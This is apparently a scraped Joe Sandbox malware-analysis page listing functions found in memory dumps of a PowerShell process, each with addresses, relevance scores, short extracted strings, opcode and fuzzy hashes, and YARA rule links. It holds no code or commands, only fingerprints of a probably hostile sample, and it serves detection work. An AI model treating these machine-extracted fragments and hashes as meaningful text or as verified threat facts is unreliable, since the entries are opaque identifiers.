Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID: fP.Q$fP.Q
API String ID: 0-2514346288
Opcode ID: f97c3cb3a31e61d3fe00b5ad25a7326c70e666df341001bead1e15d678e220f7
Instruction ID: d199c394b4f3768ec974b866700d75d5339e810a18da138b333d9352005262af
Opcode Fuzzy Hash: f97c3cb3a31e61d3fe00b5ad25a7326c70e666df341001bead1e15d678e220f7
Instruction Fuzzy Hash: 38B14D70E0020ACFDF14DFA9D9857ADBBF2EF88714F148179D819A7264EB749845CB81

Function 06F786F0 Relevance: 27.5, Strings: 21, Instructions: 1204COMMON

Download Yara Rule

Strings

tP]q, xrefs: 06F79034
$]q, xrefs: 06F793E4
4']q, xrefs: 06F78BBF
4']q, xrefs: 06F788AC
$]q, xrefs: 06F78985
tP]q, xrefs: 06F79040
4']q, xrefs: 06F78ED0
4']q, xrefs: 06F78EC6
$]q, xrefs: 06F78C92
4']q, xrefs: 06F788A0
tP]q, xrefs: 06F78D09
tP]q, xrefs: 06F78CFD
tP]q, xrefs: 06F79474
4']q, xrefs: 06F78BB3
$]q, xrefs: 06F78CC4
4']q, xrefs: 06F7918E
4']q, xrefs: 06F79198
4']q, xrefs: 06F7930E
$]q, xrefs: 06F78CB8
tP]q, xrefs: 06F79480
4']q, xrefs: 06F79302

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-829386727
Opcode ID: 786dfe0b8e70efff4407f62e4402ffd51d613b6148364cefa27d78e96c9e7881
Instruction ID: e50f7b86af5290c7c5ae6ee9ca2d165227193a9553158576e2e720b6a189fbd5
Opcode Fuzzy Hash: 786dfe0b8e70efff4407f62e4402ffd51d613b6148364cefa27d78e96c9e7881
Instruction Fuzzy Hash: 5582A631F043048FCBA59B7888196AABFE6AFC5350F1484BBD551DF292DB76C841C7A2

Function 06F77EF4 Relevance: 20.6, Strings: 16, Instructions: 587COMMON

Download Yara Rule

Strings

tP]q, xrefs: 06F782B3
$]q, xrefs: 06F784FF
$]q, xrefs: 06F78215
4']q, xrefs: 06F78363
$]q, xrefs: 06F7833E
$]q, xrefs: 06F784BB
$]q, xrefs: 06F784E3
4']q, xrefs: 06F7836F
$]q, xrefs: 06F7850B
4']q, xrefs: 06F780E9
$]q, xrefs: 06F784EF
$]q, xrefs: 06F78231
$]q, xrefs: 06F7849F
4']q, xrefs: 06F780F5
$]q, xrefs: 06F7832E
tP]q, xrefs: 06F782BF

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2054575689
Opcode ID: 21faa6ba76b29992b891a9b48cbb81b8ab1451eaf46a0743b4dc61a982d9b6f5
Instruction ID: 40f67031a8dc1ec992703ba1ed9d39bac8182839dd7893a08659de5e3b7210ee
Opcode Fuzzy Hash: 21faa6ba76b29992b891a9b48cbb81b8ab1451eaf46a0743b4dc61a982d9b6f5
Instruction Fuzzy Hash: 0A126831F002049FDBA89E6C985867BBBE6EF85390F14847BD966DB251DB35CC01C7A1

Function 06F729D0 Relevance: 18.2, Strings: 14, Instructions: 652COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F72AA6
$]q, xrefs: 06F72E27
4']q, xrefs: 06F72EDE
$]q, xrefs: 06F72E80
4']q, xrefs: 06F72CE7
$]q, xrefs: 06F72AEE
4']q, xrefs: 06F72CF3
tP]q, xrefs: 06F730B2
$]q, xrefs: 06F72E8C
tP]q, xrefs: 06F730A6
$]q, xrefs: 06F72AE2
4']q, xrefs: 06F72B48
4']q, xrefs: 06F72B54
4']q, xrefs: 06F72EEA

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2835505118
Opcode ID: b351fae6a2daf9b946dc138b4d3c4c0ba3fbfb32a830fb966bbba8a7bd396859
Instruction ID: ab972a785175ade3bbff61527269605a6e67a4c5daf144280c8c3ac4925d0a4c
Opcode Fuzzy Hash: b351fae6a2daf9b946dc138b4d3c4c0ba3fbfb32a830fb966bbba8a7bd396859
Instruction Fuzzy Hash: 27223531F043459FDB658F28C850A6ABBA6EF85710F18C4ABD845CF292DB35CE45C7A2

Function 06F71278 Relevance: 7.9, Strings: 6, Instructions: 423COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F714AE
4']q, xrefs: 06F719B8
4']q, xrefs: 06F719AC
4']q, xrefs: 06F714BA
$]q, xrefs: 06F7198A
$]q, xrefs: 06F71996

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q
API String ID: 0-2669322367
Opcode ID: 2c5bb72bcbd6b7fc4238bce86941e984a0a945e3f8588de61cde5346dcd558ee
Instruction ID: 756ccd3ea347d1c86587c07e028dd3c584038056fa1bb0e08c87b279efc1f4fe
Opcode Fuzzy Hash: 2c5bb72bcbd6b7fc4238bce86941e984a0a945e3f8588de61cde5346dcd558ee
Instruction Fuzzy Hash: ED027E34F002049FD794CB98D545A6EBBB2EF89704F18C06AE905AB395CB76EC46CB91

Function 06F767B0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F76A3F
4']q, xrefs: 06F76ABE
4']q, xrefs: 06F76A4B
4']q, xrefs: 06F768E6
4']q, xrefs: 06F76ACA
4']q, xrefs: 06F768DA

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-471056614
Opcode ID: 38ac3b6ddd941e47af60645d49dee33ffd0068534b3da9373e3993fbe0282665
Instruction ID: 10ad5870581d63da59eaad1156a0d98e83f6186c9bab28a120dacf643b87dcbb
Opcode Fuzzy Hash: 38ac3b6ddd941e47af60645d49dee33ffd0068534b3da9373e3993fbe0282665
Instruction Fuzzy Hash: 85D18D30E106148FDB589B68C555B9EBBB2EF88304F14C46AE901AF395CB75E846CBA1

Function 06F76F85 Relevance: 7.8, Strings: 6, Instructions: 312COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F772DD
4']q, xrefs: 06F7725E
4']q, xrefs: 06F77101
4']q, xrefs: 06F77252
4']q, xrefs: 06F772D1
4']q, xrefs: 06F7710D

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-471056614
Opcode ID: 6a7c83cb055f400c710f21536ab555e5a5b415cba8bfd345061d0435aadb0cbd
Instruction ID: f6ffa2d3d9f2d71f879c7f195a8de73a03cd3f929a9faa43329d203f4258c799
Opcode Fuzzy Hash: 6a7c83cb055f400c710f21536ab555e5a5b415cba8bfd345061d0435aadb0cbd
Instruction Fuzzy Hash: FBD18F30E102148FDB54DB58C955B9EBBB2EF84704F10849AE909AF385CB75ED86CFA1

Function 06F79F00 Relevance: 5.6, Strings: 4, Instructions: 602COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F7A248
4']q, xrefs: 06F7A398
4']q, xrefs: 06F7A23E
4']q, xrefs: 06F7A3A2

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 1ad029a6cfb0fdbcdac8257cc04ee5cc23e1a06438a68415117bf135da8a0957
Instruction ID: 6349503d5086b32781c01423f40df01c724cb8c4311365f26021fef5af2a3947
Opcode Fuzzy Hash: 1ad029a6cfb0fdbcdac8257cc04ee5cc23e1a06438a68415117bf135da8a0957
Instruction Fuzzy Hash: 42125532F043148FDB659B6898157AEBBA6AFC5310F1584BBE901DF291DB32C841C7E2

Function 00B8B5D0 Relevance: 4.3, Strings: 3, Instructions: 519COMMON

Download Yara Rule

Strings

$]q, xrefs: 00B8B7EA
Haq, xrefs: 00B8B696
$]q, xrefs: 00B8BB4F

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID: Haq$$]q$$]q
API String ID: 0-1533201563
Opcode ID: 15640e4e6d7f1caf11496a5a5de5d3f6ab71f591c6faf09e78f56d8a2ce365e4
Instruction ID: 15660c238a896a598964e821f3e07081f06bd2f2f895d1555d1f573448f9dc86
Opcode Fuzzy Hash: 15640e4e6d7f1caf11496a5a5de5d3f6ab71f591c6faf09e78f56d8a2ce365e4
Instruction Fuzzy Hash: D0223D34B001148FCB15AB64D854AAEB7F6FF89304F1580E9E50AAB361DF359E85CF91

Function 06F76792 Relevance: 4.0, Strings: 3, Instructions: 270COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F76A3F
4']q, xrefs: 06F76ABE
4']q, xrefs: 06F768DA

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q
API String ID: 0-705557208
Opcode ID: a3cf6d6e436b1136ef4738a1e1ad237e4eaf8e304a4b8425f4560b7ea12c8ca7
Instruction ID: 93651b79ee01b2915aa7733022ab34dea34d50a46cef00da74b7f7da5582e694
Opcode Fuzzy Hash: a3cf6d6e436b1136ef4738a1e1ad237e4eaf8e304a4b8425f4560b7ea12c8ca7
Instruction Fuzzy Hash: A9B1BD30E106148FDB54DF58C585B9EBBB2EF88304F14C45AE905AF395CB35E846CBA1

Function 06F751B0 Relevance: 3.3, Strings: 2, Instructions: 759COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F7573A
4']q, xrefs: 06F7572E

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 95f17a48681a311becae78c9653c6c6b5d93592c7d56e7ac78ee91493713d9f9
Instruction ID: 5952eca7b1a98abace5fab69b9395d2aa8a90aa8add8da387f8d48f9f30e323c
Opcode Fuzzy Hash: 95f17a48681a311becae78c9653c6c6b5d93592c7d56e7ac78ee91493713d9f9
Instruction Fuzzy Hash: 7B627B74F00214DFDB94CB98C585A6ABBB2EF88314F14C06AD906AF355CB76EC46CB91

Function 06F7740B Relevance: 2.9, Strings: 2, Instructions: 395COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F7767C
4']q, xrefs: 06F77670

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: d83a6320eb0a2c2a5c9f9775543faad2c407c1b3e0e92d4d05b1e327d8e6a643
Instruction ID: a802f539907bdc55d3c8dc26bbff1b1ce360118e88e9f307862b5545549a0a06
Opcode Fuzzy Hash: d83a6320eb0a2c2a5c9f9775543faad2c407c1b3e0e92d4d05b1e327d8e6a643
Instruction Fuzzy Hash: C2F1A030B102149FD764DB68CA55B6EBBB3EF88340F1084A9E509AF395CB75DD82CB91

Function 00B8F0B4 Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

fP.Q, xrefs: 00B8F0DF
fP.Q, xrefs: 00B8F0FF

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID: fP.Q$fP.Q
API String ID: 0-2514346288
Opcode ID: e59b6cc1be6c68d05705f25ccad0ad2d48caf64079daa2287dc79b0e07afe9c8
Instruction ID: 472bcdd60ec8c747fd23be7b3a8dd709ed43b7dc6d49049976b2540067ccbcce
Opcode Fuzzy Hash: e59b6cc1be6c68d05705f25ccad0ad2d48caf64079daa2287dc79b0e07afe9c8
Instruction Fuzzy Hash: 76B15E70E0020ACFDF10EFA9C9857AEBBF1EF48714F148179E819A7264EB749845CB95

Function 00B8F984 Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

fP.Q, xrefs: 00B8F9AF
fP.Q, xrefs: 00B8F9CF

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID: fP.Q$fP.Q
API String ID: 0-2514346288
Opcode ID: c33fb391f41ddc177f294a9d0c400f9b0c1a9e37456380daaf75252ca4e2085f
Instruction ID: 2bbeebfc1f823fc5ec9104c54c4a0901c14b7ccefab11a61603114af4a0ed25d
Opcode Fuzzy Hash: c33fb391f41ddc177f294a9d0c400f9b0c1a9e37456380daaf75252ca4e2085f
Instruction Fuzzy Hash: 7AB14B70E0020ACFDF14EFA8C9857ADBBF1EF88714F148179D819A7264EB749885CB81

Function 00B8F6FD Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

fP.Q, xrefs: 00B8F727
fP.Q, xrefs: 00B8F747

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID: fP.Q$fP.Q
API String ID: 0-2514346288
Opcode ID: 8bd5e5a91d0f38c5d1a516dd1334aab69c437874befd4d57a89c38bd61040288
Instruction ID: c39837b10375a926cfee9a6c80e41400c9a6e9fcc6d3f7f74f2f977cdefad08e
Opcode Fuzzy Hash: 8bd5e5a91d0f38c5d1a516dd1334aab69c437874befd4d57a89c38bd61040288
Instruction Fuzzy Hash: DE715E71D0020ADFDF10EFA9C9857ADBBF2FF88714F148169E419A7264EB749842CB91

Function 00B8F708 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

fP.Q, xrefs: 00B8F727
fP.Q, xrefs: 00B8F747

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID: fP.Q$fP.Q
API String ID: 0-2514346288
Opcode ID: 625b93c735a7b10b563f3f6c9fc3b705f83de5459ec8416826fa406823ca4913
Instruction ID: 431bccb8a6a7d8a2b289bb800e483c216442556616424cb0a1a9e2561b82adf0
Opcode Fuzzy Hash: 625b93c735a7b10b563f3f6c9fc3b705f83de5459ec8416826fa406823ca4913
Instruction Fuzzy Hash: BB715F71E0020ADFDF14EFA9C8857ADBBF2FF88714F148169D415A7264EB749842CB91

Function 06F75193 Relevance: 1.8, Strings: 1, Instructions: 576COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F7572E

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 35de20a062bcf87d1c6a9fa947b07675aea898e798e66689f878cad08e812f8d
Instruction ID: d2cbbd242cad4ef4444325688c46e893e9aa60cb3cf81a8c2de255bd96d66027
Opcode Fuzzy Hash: 35de20a062bcf87d1c6a9fa947b07675aea898e798e66689f878cad08e812f8d
Instruction Fuzzy Hash: D2324A74E00214DFDB54CB98C585A6ABBB2EF88714F14C06AD906AF355CB76EC46CF90

Function 06F75966 Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F7572E

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: c1848454bdcf21b083893952f578f7a019c2a7864c837fd9e11553f99e8d004c
Instruction ID: b2653b0ed318e55a63b9b159e7bd2754d7ef0afdc6ee4f5f7c037b5220633217
Opcode Fuzzy Hash: c1848454bdcf21b083893952f578f7a019c2a7864c837fd9e11553f99e8d004c
Instruction Fuzzy Hash: 35027B74E00214DFD754CB98C585B6ABBB2EF88714F14C06AE906AF355CB76EC86CB90

Function 06F7170A Relevance: 1.7, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F714AE

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 914e006d0c1a0d9d751615be1d1b69319ef4683d83ec6f7d863b980cba02a529
Instruction ID: 9f4de0b46b79f9db4334be6dd83a96b774c830bdbb9dc1a372099bb03fc0cf4d
Opcode Fuzzy Hash: 914e006d0c1a0d9d751615be1d1b69319ef4683d83ec6f7d863b980cba02a529
Instruction Fuzzy Hash: 3AF17E34B00204DFD754CB58D585BAABBB2EF84704F28C05AE905AF395CB76ED46CB91

Function 06F71258 Relevance: 1.6, Strings: 1, Instructions: 378COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F714AE

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 9e9588e1806782c5aa07279689944eb9bfb208601435135bb5bd72084b419c14
Instruction ID: d6314596a8aced8005c885bcf7b827015c63a1620b588b071f2f27e4e63c2f18
Opcode Fuzzy Hash: 9e9588e1806782c5aa07279689944eb9bfb208601435135bb5bd72084b419c14
Instruction Fuzzy Hash: 33F17C34F00204DFD794CF58D581AAABBB2EF89704F28C05AE905AB391C772ED46CB91

Function 06F71267 Relevance: 1.6, Strings: 1, Instructions: 374COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F714AE

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 9f29545df0a6ef749173f33d3403bf38f52a1240ab3f0d99395a747fd146f768
Instruction ID: abb667610888bf386c3d57a298bd65be0d41b0d302f182b990b712fd1b21535c
Opcode Fuzzy Hash: 9f29545df0a6ef749173f33d3403bf38f52a1240ab3f0d99395a747fd146f768
Instruction Fuzzy Hash: 99F17D34F00204DFD794CF58D581AAABBB2EF89704F18C05AE905AB391C772ED46CB91

Function 06F786D4 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F788A0

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 2e8507bda624a0ada1a705f5065404916a564db13436cd3d0235ac913c8ee1b4
Instruction ID: e46c95d6e033dff3ab9ae16760de325226648fce33bb549d1823b9579f8ed837
Opcode Fuzzy Hash: 2e8507bda624a0ada1a705f5065404916a564db13436cd3d0235ac913c8ee1b4
Instruction Fuzzy Hash: 3441F630F08301CFCB949B65C55DB7A7BA29F84784F1444B7D921DB251DB35C942CBA2

Function 00B82FF0 Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26b9952d52442d186e9074da5282cc8f02e79018667019c40e3d14edcb34556f
Instruction ID: 21517d5348b4e969450e5a276cda43ee7ab4364a47819f737b72851e6eb5c84a
Opcode Fuzzy Hash: 26b9952d52442d186e9074da5282cc8f02e79018667019c40e3d14edcb34556f
Instruction Fuzzy Hash: C422CC70A04248DFCB06DF68C594AAEBBF1FF49710F298196D844AB366C735EE45CB90

Function 00B836E5 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f17ac4371c398cdf40340ad0ff17deaab110d774f350848090b7caa83ffa66
Instruction ID: 63c03b3e8134a915972989e23724be1bd21ff3e5b6ae295401eb8394f6678418
Opcode Fuzzy Hash: e2f17ac4371c398cdf40340ad0ff17deaab110d774f350848090b7caa83ffa66
Instruction Fuzzy Hash: DD9109A2D0D3819FD7029B24D8957A87FF0EF23B21F4A02D7D144DB2A3D619991AC7A1

Function 00B88F78 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1961a4295706c22b1d41a53aa622ae67f636a2e27d2563b5cfff5454827b57
Instruction ID: 840301298f471b60699a367847307f0b057dd8a07b29c244188d518f1ed49106
Opcode Fuzzy Hash: 8c1961a4295706c22b1d41a53aa622ae67f636a2e27d2563b5cfff5454827b57
Instruction Fuzzy Hash: CEA15E35A00648DFCF14EFA4D984AADBBF6FF84300F158699E406AB365CB34AD49CB41

Function 06F74E08 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 361af579a4f2001a2731501c5a10df17165c222e54ca2a20c791a2d3cfcc3c60
Instruction ID: d0f20a7bb6071ad9cec4d2cfed54d44c300a0a783815a1c478d6378731affe35
Opcode Fuzzy Hash: 361af579a4f2001a2731501c5a10df17165c222e54ca2a20c791a2d3cfcc3c60
Instruction Fuzzy Hash: C891A130F102149FD754DB68C545BAABBE3EF88304F108469E901AF395CB76DC41CBA1

Function 06F74DE8 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e7f9598ba5c0de3ad74c9d947b1547618b625219e1a33bb89ae5e9af20a56f
Instruction ID: 792df4140764858ba4fb262cc980f44c301aa0137e4ced1dcd09740774fc8aa9
Opcode Fuzzy Hash: e3e7f9598ba5c0de3ad74c9d947b1547618b625219e1a33bb89ae5e9af20a56f
Instruction Fuzzy Hash: F4917F70E102149FD758CF58D545BAABBF2EF88314F1094AAE905AF391CB76AC41CBA1

Function 00B88768 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9056512b6ef4ea98970425ed8f6d7d553df84ce386b7a8d021b6e7f5b89b42c
Instruction ID: 3d40c6407c55340f9d4be4afe481ae39f7288752a4e39bfc2dcbf95c8bf58947
Opcode Fuzzy Hash: a9056512b6ef4ea98970425ed8f6d7d553df84ce386b7a8d021b6e7f5b89b42c
Instruction Fuzzy Hash: F071AC34A05204DFCB15DFA4D8849AEBBF2FF89304F6884A9E445AB361CB35EC85CB50

Function 00B896C8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23dba433d6203509248dc418cfc9b17296af3400a9ace227176b1ff4868696c8
Instruction ID: f73980e89dee5f00a181043d6fe72bf6f048c7986f7ac415e817cea54a34228d
Opcode Fuzzy Hash: 23dba433d6203509248dc418cfc9b17296af3400a9ace227176b1ff4868696c8
Instruction Fuzzy Hash: 6371A231A00219CFCB14EF68D980AADBBF6FF85314F18856AD415DB661DB35EC46CB80

Function 00B89836 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e074fa85e83942c229f26b93a6d9343f71d709c8d0417c0cdf45f9fbc919098
Instruction ID: a5f3438ac239c45b0385fd4c114df750bc41c1fb4723f04c99ce5e0048b7796b
Opcode Fuzzy Hash: 2e074fa85e83942c229f26b93a6d9343f71d709c8d0417c0cdf45f9fbc919098
Instruction Fuzzy Hash: 31711A34A00218DFDF18EFB5D980AADBBF6FF88304F148469D416AB260DB35AD46CB41

Function 06F79EE4 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fdc72d38ef60549f9377061deaa00f4bf2c4d86c52b063160d3aeb85681ed93
Instruction ID: 7c4b9bfbfb54369a2ef7d9343af48539877f8f5df0848944afa72439e20a1486
Opcode Fuzzy Hash: 3fdc72d38ef60549f9377061deaa00f4bf2c4d86c52b063160d3aeb85681ed93
Instruction Fuzzy Hash: 3C410731E007018FDBA48F248542BEE7BA6EF84745F1584ABE801AF256DB71D845C7A2

Function 00B846EB Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173735439281a5920b0bbc48cee52b5c7a7a20037c1643c86742a7bbab99bc20
